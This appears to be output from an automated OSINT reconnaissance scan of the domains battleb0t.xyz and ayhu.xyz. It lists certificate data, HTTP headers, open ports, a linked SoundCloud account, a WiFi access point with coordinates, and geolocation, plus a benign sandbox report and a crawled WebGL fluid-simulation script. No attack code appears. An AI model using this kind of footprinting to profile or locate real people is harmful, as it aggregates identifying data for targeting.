| 2023-05-12 02:55:27 | Web Server | No | URLScan.io | 0 | 0 | 1 | 0 | None | cloudflare | ayhu.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | SoundCloud (Category: music)
https://soundcloud.com/ayhu | ayhu |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-cache-status: DYNAMIC | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 02:44:42 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:91:08:65:b4:56:94:e3:89:37:6b:c8:ee:5a:fc:f4:80:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:05:11 2023 GMT
Not After : May 25 03:05:10 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:97:4b:9a:94:33:ae:7c:5e:91:1b:d8:54:22:c9:
ed:4f:8d:dc:1c:ea:82:e7:c1:66:b8:0e:7a:d7:69:
7e:97:11:2c:1a:a5:0e:64:16:12:d5:94:b3:23:f2:
36:d4:4f:eb:d5:32:50:ac:e4:d7:66:1b:e3:da:91:
79:04:66:f4:2d:fa:3e:45:f4:48:91:1a:8d:80:82:
ca:dd:66:18:cd:f2:9d:87:0d:96:09:36:f0:90:50:
74:b3:8f:d1:d4:ab:e5:3c:ba:a6:ad:57:62:22:2b:
60:de:6e:76:04:02:5d:fa:52:80:b7:61:6b:ca:89:
0e:51:38:c3:f2:4d:c1:8f:3e:5c:2f:86:ec:7a:ee:
c4:a9:09:67:fe:3a:36:2c:f4:71:dd:63:52:c7:7e:
24:13:3b:f8:64:ac:0f:17:65:8b:4f:12:db:ba:8b:
96:d7:a7:d3:5c:fd:8f:e9:26:b0:c1:d3:ce:ae:a4:
80:9b:8d:9b:1f:f6:ca:4a:88:4f:be:ed:28:2f:45:
12:8d:ed:28:4a:e1:d7:0a:d1:cc:4f:38:0f:fa:93:
2d:8d:4a:92:3a:88:82:01:24:a7:62:52:95:88:cb:
f5:21:eb:4e:1f:14:59:fb:a0:f3:53:6c:6e:20:e1:
ca:0b:83:46:36:34:c6:22:17:1b:d8:e6:82:24:68:
ca:65
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:05:12.050 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:25:A0:69:FB:7F:3E:63:7D:A0:82:F0:BD:
99:FA:FF:84:20:AF:C5:86:81:24:4B:F7:CB:AB:FB:5E:
BD:6B:87:56:02:21:00:8A:56:44:28:2B:0B:E5:D6:3A:
F4:15:7E:0A:3C:BA:80:47:38:D3:13:65:D6:8E:A8:E5:
01:04:D3:ED:D7:28:24
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 24 04:05:12.068 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:48:50:77:27:A7:8D:E9:4E:44:5B:E4:B4:
56:50:FB:20:FC:C8:FD:0F:4B:DC:68:08:A4:56:A5:4B:
F5:A5:47:B3:02:20:41:B4:A0:0F:22:1C:69:E8:F3:FB:
60:B2:81:61:62:E0:DD:28:37:13:7E:74:2B:26:74:E1:
FD:E5:4D:29:61:E7
Signature Algorithm: sha256WithRSAEncryption
61:b4:ef:73:fc:3c:d6:36:f5:75:80:0c:33:8b:9a:05:0b:c4:
ef:72:1d:69:74:95:fd:0a:84:bd:b8:b9:3c:12:87:d3:eb:2d:
b5:d2:63:2a:29:60:59:c4:11:1c:0f:c3:fb:79:2f:8a:43:57:
38:62:d8:2e:68:34:bb:6c:0e:7a:e3:f8:3d:f5:c1:05:a5:6d:
93:b9:b3:48:22:8e:a3:39:66:e6:a5:9e:dc:e2:98:35:7e:b3:
e1:c7:b2:16:b7:b0:2e:70:50:4e:ea:93:d0:f8:5c:69:6c:1b:
d2:3e:ee:da:64:1f:ad:97:c8:be:17:38:a6:ed:92:9e:3b:db:
67:c8:b0:5f:e6:af:fd:f7:57:92:7b:87:3d:bf:c4:c1:21:13:
ba:c4:d8:85:a3:63:dc:90:ee:df:3d:2a:bc:03:4e:ba:1b:8c:
0c:16:7e:58:e3:ac:7f:dc:3b:40:18:1f:74:98:d5:c4:fa:32:
99:95:a0:64:1e:5b:4d:a8:f5:79:33:2e:3f:43:dc:8d:0e:7d:
28:25:74:7a:93:27:53:2e:6b:ae:4d:81:c1:3c:e0:cd:42:02:
6d:fc:da:f3:52:57:d5:b1:70:8e:1a:91:15:c8:1b:93:cd:40:
b8:ff:29:e7:c6:05:ad:63:8c:c8:ec:d7:e9:88:33:a3:5d:43:
a1:d5:b9:20
| battleb0t.xyz |
| 2023-05-12 03:23:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.8:443 | 188.114.96.0/24 |
| 2023-05-12 03:23:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.12:8080 | 188.114.96.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:03:06:A5) | 52.3759, 4.8975 |
| 2023-05-12 02:49:49 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://justice.cz/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"194.213.41.170:443"\n "69.16.175.10:443"\n "185.199.110.153:443"\n "192.229.163.25:443"\n "49.12.245.76:443"\n "142.250.191.40:443"\n "142.250.141.154:443"\n "157.240.22.35:443"\n "104.22.24.150:443"\n "157.240.22.25:443"\n "185.60.216.52:443"\n "157.240.20.63:443"\n "157.240.22.20:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f68_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_f68_ConnHashTable<3944>_HashTable_Mutex"\n "IsoScope_f68_IE_EarlyTabStart_0xf20_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f68_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_f68_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3944"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_f68_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3944"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.lightwidget.com"\n "code.jquery.com"\n "justice.cz"\n "lightwidget.com"\n "portalapl01.servis.justice.cz"\n "scontent-frt3-2.cdninstagram.com"\n "scontent-frx5-1.cdninstagram.com"\n "scontent-sjc3-1.xx.fbcdn.net"\n "video-sjc3-1.xx.fbcdn.net"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3532.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3484.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar328E.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab321E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "combo_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "AMOH3QA1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AMOH3QA1.txt]- [targetUID: 00000000-00003944]\n "search_icon_1_.png" has type "PNG image data 21 x 22 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fH-KenfeQjI_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "315741146_1401731960362970_7444101996956285481_n_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1440x1440 components 3"- [targetUID: N/A]\n "navigation_1_.htm" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "3dl2SsY1JNJ_1_.png" has type "PNG image data 81 x 378 8-bit colormap non-interlaced"- [targetUID: N/A]\n "wtbxHBt7RZw_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "M5RPsIIWHWO_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003680]\n "main_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "325666019_185145374200950_2918817704667586375_n_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 720x1280 components 3"- [targetUID: N/A]\n "autocomplete-search_1_.js" has type "UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "PkV8_5hF_8w_1_.png" has type "PNG image data 21 x 131 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "page_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "qGoWo6gBwwP_1_.png" has type "PNG image data 28 x 168 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF4008C994FE360571.TMP" has type "data"- Location: [%TEMP%\\~DF4008C994FE360571.TMP]- [targetUID: 00000000-00003944]\n "327730364_500683298907150_5975051271861994663_n_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 213x160 components 3"- [targetUID: N/A]\n "323431877_824211398639073_8090660628312221513_n_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 526x195 components 3"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /widgets.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://justice.cz/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: platform.twitter.com\nIf-Modified-Since: Tue, 21 Nov 2017 00:17:05 GMT\nIf-None-Match: "3e4504e992f3a97e51fd54697a0f1b2e+gzip"\nDNT: 1\nConnection: Keep-Alive" (Indicator: "twitter")\n "GET /plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nReferer: https://justice.cz/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.facebook.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "facebook.com")\n "POST /platform/plugin/page/logging/ HTTP/1.1\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nX-FB-LSD: FFgmxX5EibZTC1odP1pfSA\nReferer: https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.facebook.com\nContent-Length: 454\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "facebook.com")\n "GET /rsrc.php/v3/y1/r/nMFM52FAyXC.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: static.xx.fbcdn.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "facebook.com")\n "GET /rsrc.php/v3/yo/r/g2f3nzotF0C.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: static.xx.fbcdn.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "facebook.com")\n "GET /rsrc.php/v3/yf/l/0,cross/xUCu69_VoIG.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHos | 185.199.110.153 |
| 2023-05-12 02:54:27 | Physical Location | No | Censys | 0 | 0 | 4 | 0 | None | Seattle, Washington, 98108, United States, North America | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.98): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | route3.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | North Charleston, South Carolina, 29418, United States, North America |
| 2023-05-12 02:54:16 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | /*
MIT License
Copyright (c) 2017 Pavel Dobryakov
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
'use strict';
const canvas = document.getElementsByTagName('canvas')[0];
resizeCanvas();
let config = {
SIM_RESOLUTION: 256,
DYE_RESOLUTION: 1024,
CAPTURE_RESOLUTION: 512,
DENSITY_DISSIPATION: 0.97,
VELOCITY_DISSIPATION: 0.98,
PRESSURE: 0.8,
PRESSURE_ITERATIONS: 20,
CURL: 30,
SPLAT_RADIUS: 0.3,
SPLAT_FORCE: 6000,
SHADING: true,
COLORFUL: true,
COLOR_UPDATE_SPEED: 10,
PAUSED: false,
BACK_COLOR: { r: 0, g: 0, b: 0 },
TRANSPARENT: false,
BLOOM: false,
BLOOM_ITERATIONS: 8,
BLOOM_RESOLUTION: 256,
BLOOM_INTENSITY: 0.8,
BLOOM_THRESHOLD: 0.6,
BLOOM_SOFT_KNEE: 0.7,
SUNRAYS: true,
SUNRAYS_RESOLUTION: 196,
SUNRAYS_WEIGHT: 1.0,
SOUND_SENSITIVITY: 0.25,
FREQ_RANGE: 8,
}
var timer = setInterval(randomSplat, 3500);
var _runRandom = true;
var _isSleep = false;
function randomSplat()
{
if(_runRandom == true && _isSleep == false)
splatStack.push(parseInt(Math.random() * 20) + 5);
}
//lively is minimizing browser window to pause.
//this wont obviously work once I implement proper pause -> todo:- do not call livelyAudioListener() when paused/minimized.
document.addEventListener("visibilitychange", function() {
//alert(document.hidden+ " "+document.visibilityState);
_isSleep = document.hidden;
}, false);
let timeout;
let timeoutBool=true;
function livelyAudioListener(audioArray) {
if (audioArray[0] > 5 || _isSleep == true)
{
_runRandom = true;
return;
}
if(audioArray[0]>0.1 && _runRandom){
_runRandom = false;
clearTimeout(timeout);
timeoutBool=true;
}
else{
if(!_runRandom && timeoutBool){
timeoutBool=false;
timeout=setTimeout(()=>_runRandom=timeoutBool=true,1500);
}
}
let bass = 0.0;
let half = Math.floor(audioArray.length / 2);
for (let i = 0; i <= config.FREQ_RANGE; i++) {
bass += audioArray[i];
bass += audioArray[half + i];
}
bass /= (config.FREQ_RANGE * 2);
multipleSplats(Math.floor((bass * config.SOUND_SENSITIVITY) * 10));
}
function multipleSplats (amount) {
for (let i = 0; i < amount; i++) {
const color = config.COLORFUL ? generateColor() : Object.assign({}, config.POINTER_COLOR.getRandom());
color.r *= 10.0;
color.g *= 10.0;
color.b *= 10.0;
const x = canvas.width * Math.random();
const y = canvas.height * Math.random();
const dx = 1000 * (Math.random() - 0.5);
const dy = 1000 * (Math.random() - 0.5);
splat(x, y, dx, dy, color);
}
}
function generateColor () {
let c = HSVtoRGB(Math.random(), 1.0, 1.0);
c.r *= 0.15;
c.g *= 0.15;
c.b *= 0.15;
return c;
}
function pointerPrototype () {
this.id = -1;
this.texcoordX = 0;
this.texcoordY = 0;
this.prevTexcoordX = 0;
this.prevTexcoordY = 0;
this.deltaX = 0;
this.deltaY = 0;
this.down = false;
this.moved = false;
this.color = [30, 0, 300];
}
let pointers = [];
let splatStack = [];
pointers.push(new pointerPrototype());
const { gl, ext } = getWebGLContext(canvas);
if (isMobile()) {
config.DYE_RESOLUTION = 512;
}
if (!ext.supportLinearFiltering) {
config.DYE_RESOLUTION = 512;
config.SHADING = false;
config.BLOOM = false;
config.SUNRAYS = false;
}
startGUI();
function getWebGLContext (canvas) {
const params = { alpha: true, depth: false, stencil: false, antialias: false, preserveDrawingBuffer: false };
let gl = canvas.getContext('webgl2', params);
const isWebGL2 = !!gl;
if (!isWebGL2)
gl = canvas.getContext('webgl', params) || canvas.getContext('experimental-webgl', params);
let halfFloat;
let supportLinearFiltering;
if (isWebGL2) {
gl.getExtension('EXT_color_buffer_float');
supportLinearFiltering = gl.getExtension('OES_texture_float_linear');
} else {
halfFloat = gl.getExtension('OES_texture_half_float');
supportLinearFiltering = gl.getExtension('OES_texture_half_float_linear');
}
gl.clearColor(0.0, 0.0, 0.0, 1.0);
const halfFloatTexType = isWebGL2 ? gl.HALF_FLOAT : halfFloat.HALF_FLOAT_OES;
let formatRGBA;
let formatRG;
let formatR;
if (isWebGL2)
{
formatRGBA = getSupportedFormat(gl, gl.RGBA16F, gl.RGBA, halfFloatTexType);
formatRG = getSupportedFormat(gl, gl.RG16F, gl.RG, halfFloatTexType);
formatR = getSupportedFormat(gl, gl.R16F, gl.RED, halfFloatTexType);
}
else
{
formatRGBA = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
formatRG = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
formatR = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
}
return {
gl,
ext: {
formatRGBA,
formatRG,
formatR,
halfFloatTexType,
supportLinearFiltering
}
};
}
function getSupportedFormat (gl, internalFormat, format, type)
{
if (!supportRenderTextureFormat(gl, internalFormat, format, type))
{
switch (internalFormat)
{
case gl.R16F:
return getSupportedFormat(gl, gl.RG16F, gl.RG, type);
case gl.RG16F:
return getSupportedFormat(gl, gl.RGBA16F, gl.RGBA, type);
default:
return null;
}
}
return {
internalFormat,
format
}
}
function supportRenderTextureFormat (gl, internalFormat, format, type) {
let texture = gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D, texture);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_S, gl.CLAMP_TO_EDGE);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_T, gl.CLAMP_TO_EDGE);
gl.texImage2D(gl.TEXTURE_2D, 0, internalFormat, 4, 4, 0, format, type, null);
let fbo = gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER, fbo);
gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, texture, 0);
const status = gl.checkFramebufferStatus(gl.FRAMEBUFFER);
return status == gl.FRAMEBUFFER_COMPLETE;
}
function startGUI () {
return;
var gui = new dat.GUI({ width: 300 });
gui.add(config, 'DYE_RESOLUTION', { 'high': 1024, 'medium': 512, 'low': 256, 'very low': 128 }).name('quality').onFinishChange(initFramebuffers);
gui.add(config, 'SIM_RESOLUTION', { '32': 32, '64': 64, '128': 128, '256': 256 }).name('sim resolution').onFinishChange(initFramebuffers);
gui.add(config, 'DENSITY_DISSIPATION', 0, 4.0).name('density diffusion');
gui.add(config, 'VELOCITY_DISSIPATION', 0, 4.0).name('velocity diffusion');
gui.add(config, 'PRESSURE', 0.0, 1.0).name('pressure');
gui.add(config, 'CURL', 0, 50).name('vorticity').step(1);
gui.add(config, 'SPLAT_RADIUS', 0.01, 1.0).name('splat radius');
gui.add(config, 'SHADING').name('shading').onFinishChange(updateKeywords);
gui.add(config, 'COLORFUL').name('colorful');
gui.add(config, 'PAUSED').name('paused').listen();
gui.add({ fun: () => {
splatStack.push(parseInt(Math.random() * 20) + 5);
} }, 'fun').name('Random splats');
let bloomFolder = gui.addFolder('Bloom');
bloomFolder.add(config, 'BLOOM').name('enabled').onFinishChange(updateKeywords);
bloomFolder.add(config, 'BLOOM_INTENSITY', 0.1, 2.0).name('intensity');
bloomFolder.add(config, 'BLOOM_THRESHOLD', 0.0, 1.0).name('threshold');
let sunraysFolder = gui.addFolder('Sunrays');
sunraysFolder.add(config, 'SUNRAYS').name('enabled').onFinishChange(updateKeywords);
sunraysFolder.add(config, 'SUNRAYS_WEIGHT', 0.3, 1.0).name('weight');
let captureFolder = gui.addFolder('Capture');
captureFolder.addColor(config, 'BACK_COLOR').name('background color');
captureFolder.add(config, 'TRANSPARENT').name('transparent');
captureFolder.add({ fun: captureScreenshot }, 'fun').name('take screenshot');
let github = gui.add({ fun : () => {
window.open('https://github.com/PavelDoGreat/WebGL-Fluid-Simulation');
} }, 'fun').name('Github');
github.__li.className = 'cr function bigFont';
github.__li.style.borderLeft = '3px solid #8C8C8C';
let githubIcon = document.createElement('span');
github.domElement.parentElement.appendChild(githubIcon);
githubIcon.className = 'icon github';
let twitter = gui.add({ fun : () => {
window.open('https://twitter.com/PavelDoGreat');
} }, 'fun').name('Twitter');
twitter.__li.className = 'cr function bigFont';
twitter.__li.style.borderLeft = '3px solid #8C8C8C';
let twitterIcon = document.createElement('span');
twitter.domElement.parentElement.appendChild(twitterIcon);
twitterIcon.className = 'icon twitter';
let discord = gui.add({ fun : () => {
window.open('https://discordapp.com/invite/CeqZDDE');
} }, 'fun').name('Discord');
discord.__li.className = 'cr function bigFont';
discord.__li.style.bor | https://oldfluid.battleb0t.xyz/./script.js |
